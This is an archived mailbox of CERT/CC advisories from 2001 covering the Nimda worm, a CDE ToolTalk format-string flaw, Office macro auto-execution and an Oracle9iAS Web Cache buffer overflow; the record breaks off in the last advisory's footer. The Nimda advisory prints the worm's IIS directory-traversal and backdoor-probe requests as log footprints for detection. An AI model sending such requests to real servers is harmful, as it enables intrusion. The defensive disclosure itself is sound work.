comments. Network Associates, Inc. PGP Security has published a security advisory describing this vulnerability as well as patches. This is available from http://www.pgp.com/support/product-advisories/csmap.asp http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp References 1. http://www.pgp.com/support/product-advisories/csmap.asp 2. http://www.pgp.com/naicommon/download/upgrade/upgrades-patch.asp 3. http://www.kb.cert.org/vuls/id/206723 _________________________________________________________________ The CERT Coordination Center thanks PGP Security for their advisory, on which this document is based. _________________________________________________________________ Feedback on this document can be directed to the author, Ian A. Finlay. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-25.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History September 06, 2001: Initial release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO5gEwAYcfu8gsZJZAQEcjAP+PciEp6xeIK+dGr8Hazin4sXDP9KDYfus FGN38fqzRZhNfA6ReO/9bbQp7pvuijcVB0F9BasNZc3HPTnxFpWaguqgWfNnihnB +JZHzQ4HaK0tLWT4rcorfu7U5sdXz3zHPHkdPX8B4ael0h6XJ9hJ6rq6PMIDww+P DQbVFE886v4= =wcI5 -----END PGP SIGNATURE----- From - Tue Sep 18 18:40:51 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f8J1dPF29926; Tue, 18 Sep 2001 18:39:25 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id TAA20669; Tue, 18 Sep 2001 19:33:41 -0400 (EDT) Date: Tue, 18 Sep 2001 19:33:41 -0400 (EDT) Received: by canaveral.red.cert.org; Tue, 18 Sep 2001 19:28:42 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-26 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 67b43e3b48a8286a20d42579ad3202e0 Status: RO X-Status: X-Keywords: X-UID: 22 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-26 Nimda Worm Original release date: September 18, 2001 Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Systems running Microsoft Windows 95, 98, ME, NT, and 2000 Overview The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms: * from client to client via email * from client to client via open network shares * from web server to client via browsing of compromised web sites * from client to web server via active scanning for and exploitation of the "Microsoft IIS 4.0 / 5.0 directory traversal" vulnerability (VU #111677) * from client to web server via scanning for the back doors left behind by the "Code Red II" (IN-2001-09), and "sadmind/IIS" (CA-2001-11) worms Initial analysis indicates that the worm contains no destructive payload beyond modification of web content to facilitate its own propagation. We are also receiving reports of denial of service as a result of network scanning and email propagation. I. Description The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000. Email Propagation This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable. Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment. The email message delivering the Nimda worm appears to also have the following characteristics: * The text in the subject line of the mail message appears to be variable, but those seen to date have been over 80 characters long. * There appear to be many slight variations in the attach binary file, causing the MD5 checksum to be different when one compares different attachments from different email messages. However, the file length of the attachment appears to consistently be 57344 bytes. Payload Infected client machines attempt to send copies of the Nimda worm via email to all addresses found in the Windows address book. Likewise, the client machines begin scanning for vulnerable IIS servers. Nimda looks for backdoors left by previous IIS worms: Code Red II [IN-2001-09] and sadmind/IIS worm [CA-2001-11]. It also attempts to exploit the IIS Directory Traversal vulnerability (VU #111677). The selection of potential target IP addresses follows these rough probabilities: * 50% of the time, an address with the same first two octets will be chosen * 25% of the time, an address with the same first octet will be chosen * 25% of the time, a random address will be chosen The infected client machine transfers a copy of the Nimda code to any server that it scans and finds to be vulnerable. Once running on the server machine, the worm traverses each directory in the system (including all those accessible through a file shares) and write a copy of itself to disk using the name "README.EML". When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files: This modification of web content allows further propagation of the worm to new clients through a browser or browsing of a network file system. Browser Propagation As part of the infection process, the Nimda worm modifies all web content files it finds (including, but not limited to, files with .htm, .html, and .asp extensions). As a result, any user browsing web content on the system, whether via the file system or via a web server, may download a copy of the worm. Some browsers may automatically execute the downloaded copy, thereby infecting the browsing system. File System Propagation The Nimda worm creates numerous copies of itself (using the name README.EML) in all writable directories (including those found on a network share) to which the user has access. If a user on another system subsequently selects the copy of the worm file on the shared network drive in Windows Explorer with the preview option enabled, the worm may be able to compromise that system. System FootPrint The scanning activity of the Nimda worm produces the following log entries for any web server listing on port 80/tcp: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability. II. Impact Intruders can execute arbitrary commands within the LocalSystem security context on machines running the unpatched versions of IIS. Host that have been compromised are also at high risk for being party to attacks on other Internet sites. The high scanning rate of the Nimda worm may also cause bandwidth denial-of-service conditions on networks with infected machines. III. Solutions Recommendations for System Administrators of IIS machines To determine if your system has been compromised, look for the following: * root.exe artifact (indicates a compromise by Code Red II or sadmind/IIS worms making the system vulnerable to the Nimda worm) * admin.dll artifact or unexpected .eml files in the directories with web content (indicates compromise by the Nimda worm) The only safe way to recover from the system compromise is to format the system drive(s) and reinstall the system software from trusted media (such as vendor-supplied CD-ROM). Additionally, after the software is reinstalled, all vendor-supplied security patches must be applied. The recommended time to do this is while the system is not connected to any network. However, if sufficient care is taken to disable all server network services, then the patches can be downloaded from the Internet. Detailed instructions for recovering your system can be found in the CERT/CC tech tip: Steps for Recovering from a UNIX or NT System Compromise http://www.cert.org/tech_tips/win-UNIX-system_compromise.html Apply the appropriate patch from your vendor A cumulative patch which addresses all of the IIS-related vulnerabilities exploited by the Nimda worm is available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS01-044.asp Recommendations for End User Systems Apply the appropriate patch from your vendor If you are running a vulnerable version of Internet Explorer (IE), the CERT/CC recommends applying patch for the "Automatic Execution of Embedded MIME Types" vulnerability available from Microsoft at http://www.microsoft.com/technet/security/bulletin/MS01-020.asp Run and Maintain an Anti-Virus Product It is important for users to update their anti-virus software. Most anti-virus software vendors have released updated information, tools, or virus databases to help detect and partially recover from this malicious code. A list of vendor-specific anti-virus information can be found in Appendix A. Many anti-virus packages support automatic updates of virus definitions. We recommend using these automatic updates when available. Don't open e-mail attachments The Nimda worm may arrive as an email attachment named "readme.exe". Users should not open this attachment. Disable JavaScript End-user systems can become infected with the Nimda worm by browsing web sites hosted by infected servers. This method of infection requires the use of JavaScript to be successful. Therefore, the CERT/CC recommends that end user systems disable JavaScript. Appendix A. Vendor Information Antivirus Vendor Information Central Command, Inc. http://support.centralcommand.com/cgi-bin/command.cfg/php/endus er/std_adp.php?p_refno=010918-000005 Command Software Systems http://www.commandsoftware.com/virus/nimda.html Data Fellows Corp http://www.datafellows.com/v-descs/nimda.shtml McAfee http://vil.mcafee.com/dispVirus.asp?virus_k=99209& Sophos http://www.sophos.com/virusinfo/analyses/w32nimdaa.html Symantec http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html Trend Micro http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName= TROJ_NIMDA.A http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5. asp?VName=TROJ_NIMDA.A You may wish to visit the CERT/CC's computer virus resources page located at http://www.cert.org/other_sources/viruses.html References Authors: Roman Danyliw, Chad Dougherty, Allen Householder, Robin Ruefle ______________________________________________________________________ This document is available from: http://www.cert.org/body/advisories/CA200126_FA200126.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To be added to our mailing list for advisories and bulletins, send email to cert-advisory-request@cert.org and include SUBSCRIBE your-email-address in the subject of your message. * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History September 18, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO6fYPgYcfu8gsZJZAQEG4QQAoblNKbAX/bVmJBdXy2Juf9OsMZeO2bR5 UW6hi7ddDkdUNBe52du2wU+n34tSjzA3c+0g9tYwKSXFeOp+m/CCLeYEXR+VTTel RAmY1tOzDfMIDxD6+GrvfajYMz4pCGoSJgIdPGKxJm0Tnf6iv4akaYSAB4BPRw7A FVp6JcCbatg= =FizN -----END PGP SIGNATURE----- From - Fri Oct 5 13:23:55 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f95KE5t09834; Fri, 5 Oct 2001 13:14:05 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id OAA02580; Fri, 5 Oct 2001 14:56:06 -0400 (EDT) Date: Fri, 5 Oct 2001 14:56:06 -0400 (EDT) Received: by canaveral.red.cert.org; Fri, 5 Oct 2001 14:50:49 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-27 X-Mozilla-Status: 9001 X-Mozilla-Status2: 00000000 X-UIDL: 8f1c42a6bea5b3cd9d12e2f8b72f54be Status: RO X-Status: X-Keywords: X-UID: 23 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-27 Format String Vulnerability in CDE ToolTalk Original release date: October 5, 2001 Last revised: Thu Oct 5 14:17:55 EDT 2001 Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Systems running CDE ToolTalk Overview There is a remotely exploitable format string vulnerability in the CDE ToolTalk RPC database service. This vulnerability could be used to crash the service or execute arbitrary code, potentially allowing an intruder to gain root access. This vulnerability is documented in VU#595507. I. Description The Common Desktop Environment (CDE) is an integrated graphical user interface that runs on Unix and Linux operating systems. CDE ToolTalk is a message brokering system that provides an architecture for applications to communicate with each other across hosts and platforms. The ToolTalk RPC database server, rpc.ttdbserverd, manages communication between ToolTalk applications. For more information about CDE, see http://www.opengroup.org/cde/ http://www.opengroup.org/desktop/faq/ There is a remotely exploitable format string vulnerability in the CDE ToolTalk RPC database server. While handling an error condition, a syslog(3) function call is made without providing a format string specifier argument. Since rpc.ttdbserverd does not perform adequate input validation or provide the format string specifier argument, a crafted RPC request containing format string specifiers will be interpreted by the vulnerable syslog(3) function call. Such a request can be designed to overwrite specific locations in memory, thus executing code with the privileges of rpc.ttdbserverd, typically root. The vulnerability was discovered by Internet Security Systems (ISS) X-Force. For more information, see http://xforce.iss.net/alerts/advise98.php This vulnerability has been assigned the identifier CAN-2001-00717 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0717 Many common UNIX systems ship with CDE ToolTalk installed and enabled by default. The rpcinfo command may help determine if a system is running the ToolTalk RPC database service: $ rpcinfo -p hostname The program number for the ToolTalk RPC database service is 100083. References to this number in the output from rpcinfo or in /etc/rpc may indicate that the ToolTalk RPC database service is running. Any system that does not run the ToolTalk RPC database service is not vulnerable to this problem. II. Impact An attacker can execute arbitrary code with the privileges of the rpc.ttdbserverd process, typically root. III. Solution Apply a patch Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly. Block access to vulnerable service Until patches are available and can be applied, you may wish to block access to the RPC portmapper service and the ToolTalk RPC service from untrusted networks such as the internet. Using a firewall or other packet-filtering technology, block the ports used by the RPC portmapper and ToolTalk RPC services. The RPC portmapper service typically runs on ports 111/tcp and 111/udp. The ToolTalk RPC service may be configured to use port 692/tcp or another port as indicated in output from the rpcinfo command. Keep in mind that blocking ports at a network perimeter does not protect the vulnerable service from the internal network. It is important to understand your network configuration and service requirements before deciding what changes are appropriate. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Caldera, Inc. Caldera UnixWare and Open Linux are vulnerable, and a fix is forthcoming. Compaq Computer Corporation Compaq Computer Corporation ============================ Software Security Response Team Severity: low ToolTalk RPC Server Format String Vulnerability This potential security vulnerability has not been reproduced for any release of Compaq Tru64 Unix. However with the information available, we are providing a patch that will further reduce any potential vulnerability. A patch has been made available for all supported versions of Tru64/ DIGITAL UNIX V4.0f, V4.0g, V5.0a, V5.1, and V5.1a. *This solution will be included in a future distributed release of Compaq's Tru64/ DIGITAL UNIX. This patch may be obtained from the following URL address: http://www.support.compaq.com/patches/ Select BROWSE PATCH TREE and choose the version directory required. The patch names are: DUV40F17-C0056200-11703-ER-*.tar T64V40G17-C0007000-11704-ER-*.tar T64V50A17-C0015500-11705-ER-*.tar T64V5117-C0065200-11706-ER-*.tar T64V51Assb-C0000800-11707-ER-*.tar Note: Te asterisk in the filename indicates the remainder of the tarfile name may change depending on the applicable date. This patch can be installed on: V4.0f, V4.0g all patch kits V5.0a, V5.1, and V5.1a all patch kits Cray Inc. UNICOS and UNICOS/mk are not vulnerable to [this] advisory. For further inform ation see Cray SPR 721061. Cray SPRs are available to licensed Cray customers. Hewlett-Packard Company Patches are now available from HP. See HPSBUX0110-168 for details. IBM Corporation IBM AIX 5.1 and 4.3 are vulnerable. IBM has released an emergency fix (efix) w hich contains patched binaries for both AIX 5.1 and AIX 4.3 as well as an advis ory: ftp://aix.software.ibm.com/aix/efixes/security/tooltalk_efix.tar.Z IBM is working on APARs which will not be available until late October or Novem ber of 2001. AIX 4.3: Pending assignment AIX 5.1: APAR #IY23846 The Open Group The Open Group maintains source code for the Common Desktop Environment (CDE). Source licensees of The Open Group's CDE product can contact desktop@opengroup.org for advice and a source patch that address this issue. SGI SGI acknowledges the CDE vulnerabilities reported by CERT and is currently investigating. No further information is available at this time. For the protection of all our customers, SGI does not disclose, discuss or confirm vulnerabilities until a full investigation has occurred and any necessary patch(es) or release streams are available for all vulnerable and supported IRIX operating systems. Until SGI has more definitive information to provide, customers are encouraged to assume all security vulnerabilities as exploitable and take appropriate steps according to local site security policies and requirements. As further information becomes available, additional advisories will be issued via the normal SGI security information distribution methods including the wiretap mailing list. http://www.sgi.com/support/security/ Sun Sun has reproduced the vulnerability and is testing a fix. The Sun patches will be made available at the following location: http://sunsolve.sun.com/securitypatch/ Xi Graphics Xi Graphics is investigating this report and will provide more information when it is available. Appendix B. - References 1. http://www.opengroup.org/cde/ 2. http://www.opengroup.org/desktop/faq/ 3. http://xforce.iss.net/alerts/advise98.php 4. http://www.kb.cert.org/vuls/id/595507 5. http://www.cert.org/advisories/CA-1998-11.html _________________________________________________________________ _________________________________________________________________ The CERT Coordination Center thanks Internet Security Systems (ISS) X-Force, who published an advisory on this issue. We would also like to thank The Open Group for technical assistance. _________________________________________________________________ Authors: Art Manion and Shawn V. Hernan ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-27.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History October 5, 2001: initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO738iqCVPMXQI2HJAQHZFgP+Pr97BrhjEZKFE+MnpJMrGzy7fyWS9YTb Q07LB4f/q7RWx/aaj09xh15G7OSrAIS32Nw5Ksdgr1AqObGDsEvkVb4rflb7VcuM UJ+43zAAuv3uww/BR40itprqCw5aL8GomBvnUyVj/VDzGQHa26Vj8nILFo/dmASt ouGA2RLQI/s= =mdjA -----END PGP SIGNATURE----- From - Mon Oct 8 13:44:04 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f98KcrW29045; Mon, 8 Oct 2001 13:38:53 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id PAA16386; Mon, 8 Oct 2001 15:43:43 -0400 (EDT) Date: Mon, 8 Oct 2001 15:43:43 -0400 (EDT) Received: by canaveral.red.cert.org; Mon, 8 Oct 2001 15:38:19 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-28 X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 32a843cab39401a05ce2295a9c5a372a Status: RO X-Status: X-Keywords: X-UID: 24 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-28 Automatic Execution of Macros Original release date: October 08, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems running: * Windows + Microsoft Excel 2000 + Microsoft Excel 2002 + Microsoft PowerPoint 2000 + Microsoft PowerPoint 2002 * Macintosh + Microsoft Excel 98 + Microsoft Excel 2001 + Microsoft PowerPoint 98 + Microsoft PowerPoint 2001 Overview An intruder can include a specially crafted macro in a Microsoft Excel or PowerPoint document that can avoid detection and run automatically regardless of the security settings specified by the user. I. Description Microsoft Excel and PowerPoint scan documents when they are opened and check for the existence of macros. If the document contains macros, the user running Excel or PowerPoint is alerted and asked if he would like the macros to be run. However, Microsoft Excel and PowerPoint may not detect malformed macros, so a user can unknowingly run macros containing malicious code when opening an Excel or PowerPoint document. An intruder who can entice or deceive a victim into opening a document using a vulnerable version of Excel or PowerPoint could take any action the victim could take, including, but not limited to * reading, deleting, or modifying data, either locally or on open file shares * modifying security settings (including macro virus protection settings) * sending electronic mail * posting data to or retrieving data from web sites For more information, please see http://securityresponse.symantec.com/avcenter/security/Content/ 2001.10.04.html http://www.microsoft.com/technet/treeview/default.asp?url=/tech net/security/bulletin/MS01-050.asp Given the strong potential for widespread abuse of this vulnerability, we strongly recommend that you apply patches as soon as you are able. For example, the Melissa virus which spread in March of 1999 used social engineering to convince victims to execute a macro embedded in a Microsoft Word document. For more information, see the CERT/CC Advisory listed below. http://www.cert.org/advisories/CA-1999-04.html As a general practice, everyone should be aware of the potential damage that Trojan horses and other kinds of malicious code can cause to any platform. For more information, see http://www.cert.org/advisories/CA-1999-02.html This vulnerability has been assigned the identifier CAN-2001-0718 by the Common Vulnerabilities and Exposures (CVE) group: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0718 II. Impact An attacker can execute arbitrary code on the target system with the privileges of the victim running Excel or PowerPoint. III. Solution Apply a patch Appendix A contains information from vendors who have provided information for this advisory. We will update the appendix as we receive more information. If a vendor's name does not appear, then the CERT/CC did not hear from that vendor. Please contact your vendor directly. Until a patch can be applied, and as a general practice, we recommend using caution when opening attachments. However, it is important to note that relying on the "From" line in an electronic mail message is not sufficient to authenticate the origin of the document. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Microsoft Corporation See Microsoft Security Bulletin MS01-050 Appendix B. - References 1. http://securityresponse.symantec.com/avcenter/security/Content/200 1.10.04.html 2. http://www.microsoft.com/technet/treeview/default.asp?url=/technet /security/bulletin/MS01-050.asp 3. http://www.kb.cert.org/vuls/id/287067 4. http://www.cert.org/advisories/CA-1999-04.html 5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0718 _________________________________________________________________ _________________________________________________________________ The CERT Coordination Center thanks Peter Ferrie and Symantec Security Response, who discovered this vulnerability and published the information in their advisory. Additionally, we thank Microsoft Corporation, who published an advisory on this issue. _________________________________________________________________ Author: Ian A. Finlay and Shawn V. Hernan. ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2001-28.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. _________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2001 Carnegie Mellon University. Revision History October 8, 2001: initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBO8H+YKCVPMXQI2HJAQHlegP+P6LyxsV880PLmLoip+dUJs6LcMER+t7r uNU4MABB66f7B8pLNUTHI4cSzTdkH2mYC/fzdro92Z1t5VNTlMAQ3V27WP03OrU6 BdbduoHCXVWZMHYe1otl8ePPwPDwdYvajlEUoXSeG97Jl3pbA5wcCCvBdnRvhREr gSzpV7t53FU= =B68T -----END PGP SIGNATURE----- From - Thu Oct 25 22:08:57 2001 Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by uclink4.berkeley.edu (8.11.4/8.11.4) with ESMTP id f9Q56dY22479; Thu, 25 Oct 2001 22:06:39 -0700 (PDT) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.11) with SMTP id WAA29887; Thu, 25 Oct 2001 22:26:13 -0400 (EDT) Date: Thu, 25 Oct 2001 22:26:13 -0400 (EDT) Received: by canaveral.red.cert.org; Thu, 25 Oct 2001 22:20:55 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2001-29 Oracle9iAS Web Cache vulnerable to buffer overflow X-Mozilla-Status: 8001 X-Mozilla-Status2: 00000000 X-UIDL: 7df7774b47fd3d6fa43159c17af1dd46 Status: RO X-Status: X-Keywords: X-UID: 25 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-29 Oracle9iAS Web Cache vulnerable to buffer overflow Original release date: October 25, 2001 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected Systems running: * Oracle9iAS Web Cache Overview A remotely exploitable buffer overflow in the Oracle9iAS Web Cache allows intruders to execute arbitrary code or disrupt the normal operation of Web Cache. I. Description Defcom Labs has discovered a remotely exploitable buffer overflow vulnerability in the Oracle9iAS Web Cache (on all platforms) that allows intruders to either execute arbitrary code with the privileges of the Web Cache process, or disrupt the normal operation of Web Cache. The Oracle9iAS Web Cache provides four web services that are all vulnerable and enabled by default when the software is installed. For more information about these web services, please see the Oracle9iAS Web Cache Administration and Deployment Guide (registration required). These services and the associated ports they listen on are listed below: * 1100/tcp (incoming web cache proxy) * 4000/tcp (administrative interface) * 4001/tcp (web XML invalidation port) * 4002/tcp (statistics port) Additional information regarding this vulnerability is available at http://otn.oracle.com/deploy/security/pdf/webcache.pdf http://www.securityfocus.com/archive/1/3BCEE434.F597D815@defcom.com II. Impact An intruder can execute arbitrary code with the privileges of the web cache process or disrupt the normal operation of Web Cache. Additionally, an intruder might be able to intercept and/or modify sensitive data such as credentials and other types of sensitive information passing through the host running Web Cache. Finally, an intruder may be able to gain access to other systems by using Web Cache as an entry point into the network or by leveraging an existing trust relationship between Web Cache and another system. III. Solution Install a patch from Oracle. More information is available in Appendix A. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. When vendors report new information to the CERT/CC, we update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Oracle Please see http://otn.oracle.com/deploy/security/pdf/webcache.pdf Appendix B. - References 1. http://otn.oracle.com/deploy/security/pdf/webcache.pdf 2. http://www.kb.cert.org/vuls/id/649979 3. http://www.securityfocus.com/archive/1/3BCEE434.F597D815@defcom.com _________________________________________________________________ _________________________________________________________________ The CERT Coordination 